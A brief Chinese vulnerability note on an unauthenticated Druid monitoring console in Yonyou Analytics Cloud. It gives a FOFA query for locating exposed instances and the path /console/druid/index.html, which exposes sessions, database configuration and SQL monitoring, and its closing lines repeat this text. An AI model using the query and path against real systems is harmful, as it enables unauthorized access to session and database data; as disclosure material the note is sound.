用友分析云druid未授权访问漏洞
一、漏洞简介
用友分析云存在druid未授权访问漏洞,用友分析云默认启动druid,未对druid做登录认证,导致任意用户可直接访问druid,读取session、数据库配置、SQL监控、Spring监控、查看JsonApi。
二、影响版本
- 用友分析云
三、资产测绘
- fofa
app="用友分析云"
- 登录页面
四、漏洞复现
http://xx.xx.xx.xx/console/druid/index.html
用友分析云存在druid未授权访问漏洞,用友分析云默认启动druid,未对druid做登录认证,导致任意用户可直接访问druid,读取session、数据库配置、SQL监控、Spring监控、查看JsonApi。
app="用友分析云"
http://xx.xx.xx.xx/console/druid/index.html